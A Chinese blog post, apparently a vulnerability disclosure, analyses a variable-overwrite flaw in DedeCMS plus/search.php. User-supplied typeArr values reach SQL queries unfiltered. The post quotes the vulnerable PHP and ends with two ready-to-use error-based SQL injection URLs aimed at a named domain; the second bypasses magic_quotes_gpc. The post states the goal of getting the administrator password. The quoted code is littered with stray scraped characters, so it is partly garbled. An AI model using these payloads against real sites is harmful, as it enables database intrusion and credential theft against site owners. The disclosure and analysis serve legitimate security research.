微博上看到就分析了一下,这个漏洞不止一处地方可以被利用,其实在 magic_quotes_gpc = On 的时候也可以无视.真心不鸡肋.
作者: c4rp3nt3r@0x50sec.org
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
黑哥说漏洞已补,怪我没有测试好,也没用这个黑站…不过这个漏洞真心不错,应该有一定利用价值.标题就不改了,补了就公开了吧.
============
Dedecms最新版 plus/search.php 文件存在变量覆盖漏洞,成功利用该漏洞可以获取管理员密码.
require_once(dirname(__FILE__).”/../include/common.inc.php”);
+ t+ \8 k) k7 wrequire_once(DEDEINC.”/arc.searchview.class.php”);
! U! U0 M7 S$ c3 e 9 E' x4 p; o% ]# j. s
$pagesize = (isset($pagesize) && is_numeric($pagesize)) ? $pagesize : 10;; C, O C0 Q( Z
$typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0;
& t- E, g4 \) b- z E0 K$channeltype = (isset($channeltype) && is_numeric($channeltype)) ? $channeltype : 0;
+ m4 J- I X4 C+ X3 q. H1 N$kwtype = (isset($kwtype) && is_numeric($kwtype)) ? $kwtype : 1;9 W! I& R X: [$ N! O
$mid = (isset($mid) && is_numeric($mid)) ? $mid : 0;
4 _7 G( v6 r1 h
" L: |' B8 ?' f0 [' L4 t/ b G" zif(!isset($orderby)) $orderby=”;
) R( @2 J# W1 e) Uelse $orderby = preg_replace(“#[^a-z]#i”, ”, $orderby);( s6 D7 H1 V+ x
/ H1 z7 ~! I8 `! R
" S& ^% J( R. e0 jif(!isset($searchtype)) $searchtype = ‘titlekeyword’;! `% O, G: m4 ]) e
else $searchtype = preg_replace(“#[^a-z]#i”, ”, $searchtype);
6 h. m% C; d8 E* Z ; V( o- \/ M. x5 Q! I s/ P, @
if(!isset($keyword)){
/ q% D* j2 K- o8 `9 x if(!isset($q)) $q = ”;6 A2 K2 m5 K7 x5 v/ H# [
$keyword=$q;; I- _: t* ^# U6 m7 h
}
% A9 A; R1 N0 y 7 L) E) Z% |, u5 @1 o2 X. N5 A
$oldkeyword = $keyword = FilterSearch(stripslashes($keyword));+ C) R, x) O+ y: t+ e2 W& \
2 M* b0 ]; x; g
//查找栏目信息
7 r# c' q4 b4 `if(empty($typeid)). l) z% J4 C" q" g7 R
{- j" o/ z% H/ @
$typenameCacheFile = DEDEDATA.’/cache/typename.inc’;+ ^% c: @0 O, U5 @7 ^( W: s
if(!file_exists($typenameCacheFile) || filemtime($typenameCacheFile) < time()-(3600*24) )% e) I) e0 M7 Q0 K0 D
{
6 N* C Z/ O" ~ $fp = fopen(DEDEDATA.’/cache/typename.inc’, ‘w’);
1 _: x) f+ u4 Y3 ?7 E fwrite($fp, “<”.”?php\r\n”);
4 c7 p* d6 Y9 i8 N- c/ m $dsql->SetQuery(“Select id,typename,channeltype From `#@__arctype`”);$ C- @* O& k5 `6 o
$dsql->Execute();6 }% C5 R- |% P$ {
while($row = $dsql->GetArray())" T7 u0 [ b6 w$ E# s% {. W. Y" O
{
1 h6 ~9 O. R2 V" R fwrite($fp, “\$typeArr[{$row['id']}] = ‘{$row['typename']}’;\r\n”);/ J/ \6 z. Y8 A& c, v# B U/ a4 x
}
/ t; `+ s7 F, [( F fwrite($fp, ‘?’.'>’);
: s; U4 K1 P) S2 u: r fclose($fp);1 b) C6 {* K- |' A8 T
}
3 w' g+ r& K$ U8 L, k* h [% U9 v% } //引入栏目缓存并看关键字是否有相关栏目内容$ [$ i! g( Q9 Z& J
require_once($typenameCacheFile);
\4 J% |2 _$ X. n3 U1 ~% Y//$typeArr这个数组是包含生成的临时文件 里面定义的,由于dedecms的全局变量机制,我们可以自己定义一个. e3 ^1 q8 r7 s
//
" m7 E4 z/ ]" q% L: x if(isset($typeArr) && is_array($typeArr))# X" Y* }" `6 j* t" W! D0 u
{/ f3 T# c3 D$ Q2 ^3 X/ F
foreach($typeArr as $id=>$typename)
% B; V- M7 [8 _3 t) S: ~5 S {- A, w0 L/ B5 }
# H. N3 ^+ p+ e3 A" a <font color=”Red”>$keywordn = str_replace($typename, ‘ ‘, $keyword);</font> //这个地方要绕过
! c. z, \( [, F0 A0 A if($keyword != $keywordn)# Y' y% i6 ]8 O& p9 @' f0 k8 `3 k2 J+ ]
{
! h# { N1 a4 E+ \- }" F3 Q0 d $keyword = $keywordn;
# b. K2 e m7 v <font color=”Red”>$typeid = $id; </font>// 这里存在变量覆盖漏洞使 $typeid = (isset($typeid) && is_numeric($typeid)) ? $typeid : 0; 这句过滤成了摆设
G) @" k. q a- x( O2 x break;
+ [$ w5 V# r g+ m }! k) E( M9 p# ]/ W6 A0 ^
}
4 ^( @- j) z! }, V/ l6 P/ j' j }
3 B2 d2 A' f* K9 s4 d! J% P& x1 d- y$ b}
然后 plus/search.php 文件下面定义了一个 Search 类的对象.
在 arc.searchview.class.php 文件的 SearchView 类的构造函数中创建了一个 TypeLink 对象.
6 e: p* K. y. X$ p" S8 ~$this->TypeLink = new TypeLink($typeid);! ^, H# O9 {4 b1 R0 v! m. F D# k# d
TypeLink 类的构造函数对 $typeid 没有再做过滤(程序员以为前面已经过滤过了…),直接带入了 SQL 语句.
& r$ n: T8 ^9 N5 y3 Tclass TypeLink+ c8 O. S1 ?' u% ^& d! \9 O L
{4 z: P0 s- }$ r$ N+ ~
var $typeDir;
% b5 Q( ?) Z8 {1 k3 w* T/ z1 e var $dsql;6 p, f5 k) ~+ i' z. N9 F! N
var $TypeID;
) E/ K/ i' E( n' `) w; f( k% H( \ var $baseDir;
3 N: V8 T; I r2 Q' S5 ] var $modDir; U( E4 z9 t2 \4 [/ P
var $indexUrl;
# x4 k$ \9 D$ w4 q3 B# z' n) F, J' D! O var $indexName;
, q. M1 f0 Z+ I' d+ u) m0 q var $TypeInfos;
3 N: E9 b' @7 H" m' t& K+ x var $SplitSymbol;
) m* R/ Q& {0 f- a var $valuePosition;. P) i4 T& b$ @; q9 g4 r. m
var $valuePositionName;* ~2 U. _+ e7 @/ @3 ?8 X
var $OptionArrayList;//构造函数///////. [0 u5 G0 ]1 i
//php5构造函数
$ g V9 t9 U2 ?7 ?0 g4 v function __construct($typeid)
$ f% s5 W" m/ y9 _8 i! o% M& h. h {
8 O( q+ p5 J$ M0 m5 s; _+ o5 Q+ Q1 r $this->indexUrl = $GLOBALS['cfg_basehost'].$GLOBALS['cfg_indexurl'];0 i8 V/ D/ y; ]/ Z* x: {
$this->indexName = $GLOBALS['cfg_indexname'];
$ e1 W z! @3 K, m- r ? b9 r2 w( O $this->baseDir = $GLOBALS['cfg_basedir'];
3 U& z8 q/ |& z G2 w $this->modDir = $GLOBALS['cfg_templets_dir'];9 G8 f. R5 V$ }3 o3 {
$this->SplitSymbol = $GLOBALS['cfg_list_symbol'];
5 v, j2 F% S; S, q $this->dsql = $GLOBALS['dsql'];6 y% y: c2 M4 i. \+ |. P+ K, [% d
$this->TypeID = $typeid;- s- t- ?- P) z) @; |& u/ q
$this->valuePosition = ”;
- H; s, L1 \* w) I $this->valuePositionName = ”;
( j8 {& |% b' Z' K* |; } $this->typeDir = ”;
4 f9 ?$ b, Q. r8 D $this->OptionArrayList = ”;
/ ?; k; ~5 w3 [& X6 P , R7 z; ]' k" |
//载入类目信息
! j0 w6 J& ~1 @% j4 `& K& G' b ! d5 D j7 b: X7 a
<font color=”Red”>$query = “SELECT tp.*,ch.typename as
0 y' m: q; K6 c6 ]ctypename,ch.addtable,ch.issystem FROM `#@__arctype` tp left join
. |0 g$ n! Q" c0 ~0 x`#@__channeltype` ch4 d* K! X* c# @ j4 N6 h6 q0 L S
on ch.id=tp.channeltype WHERE tp.id=’$typeid’ “;</font> //注射漏洞发生在这里,很明显需要magic_quotes_gpc = Off 鸡肋了吗?好可以吧至少不需要会员中心阿% i/ Y. g3 M* f% R
2 g4 X9 ~0 a% o) a. @' t if($typeid > 0)3 R Q. B {9 k n2 b1 W+ v7 |
{
6 Z2 P: H& q3 B* G4 K $this->TypeInfos = $this->dsql->GetOne($query);) ^6 G9 Y x ^+ V; }7 Z# d
利用代码一,需要 magic_quotes_gpc = Off
* G3 l4 R# ]* k. U) wwww.political-security.com/plus/search.php?typeArr[2%27%20and%20@%60\%27%60%3D0and%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20%27]=c4&kwtype=0&q=c4rp3nt3r&searchtype=title) E" ?8 q. b2 R) h1 A: C; S" `) H2 N0 D
这只是其中一个利用代码… Search 类的构造函数再往下
……省略
9 Y: F. g( R/ r: N6 z# @1 O, ~$this->TypeID = $typeid;6 _$ k& O9 Q& p3 U* b3 @2 _/ D
……省略
/ \8 \: b$ x* ?( @6 H+ ?: { z; eif($this->TypeID==”0″){# u' \, O; m* c1 V; f$ H4 k
$this->ChannelTypeid=1;
m# @# s4 U& ~& d) g, X }else{- L% J2 T4 I- f Q
$row =$this->dsql->GetOne(“SELECT channeltype FROM `#@__arctype` WHERE id={$this->TypeID}”); //这里的注入漏洞无视magic_quotes_gpc = On的存在哦亲
2 W9 Y$ F4 J# d5 y5 i S. ^/ {//现在不鸡肋了吧亲…# [5 c( D* T/ B. H
$this->ChannelTypeid=$row['channeltype'];. r* b- h1 @4 A6 d6 R; z' H+ B8 {: W
6 k8 P' w& R' f$ D- D G }
利用代码二,下面这个 EXP 即使 magic_quotes_gpc = On 也可以成功利用.
2 h; w! r& [" t, y9 u' X% r$ |4 Owww.political-security.com /plus/search.php?typeArr[1%20or%20@%60%27%60%3D1%20and%20%28SELECT%201%20FROM%20%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28Select%20%28version%28%29%29%29,1,62%29%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%20and%20@%60%27%60%3D0]=11&&kwtype=0&q=1111&searchtype=title
如果那个数据库表里存在内容,就要考虑得复杂点了.我也没考虑那么周全,分析了下然后简单测试了下,也没用来黑站.
|